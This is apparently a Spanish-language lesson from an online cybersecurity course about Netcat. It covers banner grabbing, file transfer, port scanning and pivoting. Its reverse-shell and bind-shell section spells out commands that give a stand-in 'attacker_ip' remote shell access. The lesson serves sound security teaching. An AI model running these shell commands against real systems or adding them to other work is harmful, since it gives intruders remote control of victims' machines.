Netcat: la navaja suiza
Utilice nc para obtener banners, transferir archivos, redirigir puertos y crear shells inversas sencillas.
Netcat: la navaja suiza es una lección gratuita de Cyber Security Academy en CoddyKit. Esta es la lección 3 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cyber Security Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué es Netcat?
Netcat (nc) es una herramienta que lee y escribe datos a través de conexiones de red mediante TCP o UDP. Está instalada en casi todos los sistemas Unix y resulta inestimable para depurar, transferir archivos y realizar explotaciones básicas.
Conexión básica y obtención de banners
Conéctese a cualquier puerto TCP para obtener el banner del servicio e interactuar manualmente con el protocolo. Esta es la forma más sencilla de reconocimiento.
# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]
# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTPEscucha en un puerto
Netcat puede escuchar conexiones entrantes con -l -p. Esto resulta útil para probar la conectividad, capturar reverse shells y recibir archivos.
# Listen on port 4444
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS resolution
# -p port numberTransferencia de archivos con Netcat
Netcat puede enviar archivos canalizándolos a una conexión. El receptor escucha y redirige la salida a un archivo. No hay cifrado: utilícelo únicamente en redes de confianza.
# Receiver (runs first):
nc -lvnp 4444 > received_file.txt
# Sender:
nc 192.168.1.10 4444 < file_to_send.txtEscaneo de puertos con Netcat
Netcat puede realizar escaneos básicos de puertos con -z (modo sin E/S) y -w (tiempo de espera). Es más lento que Nmap, pero resulta útil cuando Nmap no está disponible.
# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded
# With timeout:
nc -zvw2 192.168.1.100 22 80 443Reverse shell simple
Una reverse shell hace que el objetivo se conecte de vuelta al atacante. Resulta útil en pruebas de penetración cuando las reglas del firewall bloquean las conexiones entrantes al objetivo.
# Attacker listens:
nc -lvnp 4444
# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Or via nc:
nc attacker_ip 4444 -e /bin/bashBind shell
Una bind shell escucha en la máquina objetivo. El atacante se conecta a ella. Es menos común en los pentests modernos, ya que los firewalls suelen bloquear las conexiones entrantes.
# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash
# On attacker: connect
nc target_ip 5555Modo UDP
Use -u para las conexiones UDP. Resulta útil para probar servicios UDP como DNS (puerto 53) y SNMP (puerto 161).
# Test DNS over UDP
nc -u 8.8.8.8 53
# Test SNMP
nc -u 192.168.1.1 161Uso de proxies con Netcat
Netcat puede encadenar conexiones para pivotar a través de redes. Combinado con pipes con nombre (mkfifo), crea túneles bidireccionales sencillos sin herramientas adicionales.
mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipeNcat: la alternativa moderna
Ncat (parte de Nmap) amplía Netcat con compatibilidad con SSL (--ssl), control de acceso y modo broker. Prefiera Ncat para los canales cifrados.
# SSL listener
ncat --ssl -lvnp 4444
# SSL connect
ncat --ssl target_ip 4444Defensores: detección de Netcat
Las conexiones de Netcat parecen conexiones TCP normales. Los defensores pueden detectarlo mediante la supervisión del nombre del proceso (HIDS), puertos salientes inusuales y shells iniciadas por procesos principales inesperados.
Comprobación rápida
¿Qué opción de Netcat activa el modo de escucha?
Resumen: Netcat
Netcat es una herramienta fundamental: utilícelo para obtener banners, transferir archivos, probar la conectividad y comprender el funcionamiento de las reverse shells y las bind shells. En pentests autorizados, permite validar las reglas del firewall y simular el pivoting de un atacante. Conózcalo bien, tanto para utilizarlo como para detectarlo.
Preguntas frecuentes
¿La lección «Netcat: la navaja suiza» es gratis?
Sí — el texto completo de «Netcat: la navaja suiza» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cyber Security Academy, actualiza a CoddyKit PRO. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué aprenderé en «Netcat: la navaja suiza»?
Utilice nc para obtener banners, transferir archivos, redirigir puertos y crear shells inversas sencillas. Practicas Cyber Security Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.
¿Necesito experiencia previa para empezar Cyber Security Academy?
No se requiere experiencia previa. Cyber Security Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 3 de 4.
¿Cuánto tiempo toma la lección «Netcat: la navaja suiza»?
La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.
¿Puedo escribir y ejecutar código en esta lección de Cyber Security Academy?
Sí. Cada lección de Cyber Security Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.
Todas las lecciones de este curso
- Técnicas de escaneo de puertos con Nmap
- Fingerprinting de servicios y sistemas operativos
- Netcat: la navaja suiza
- Scripting para la enumeración de redes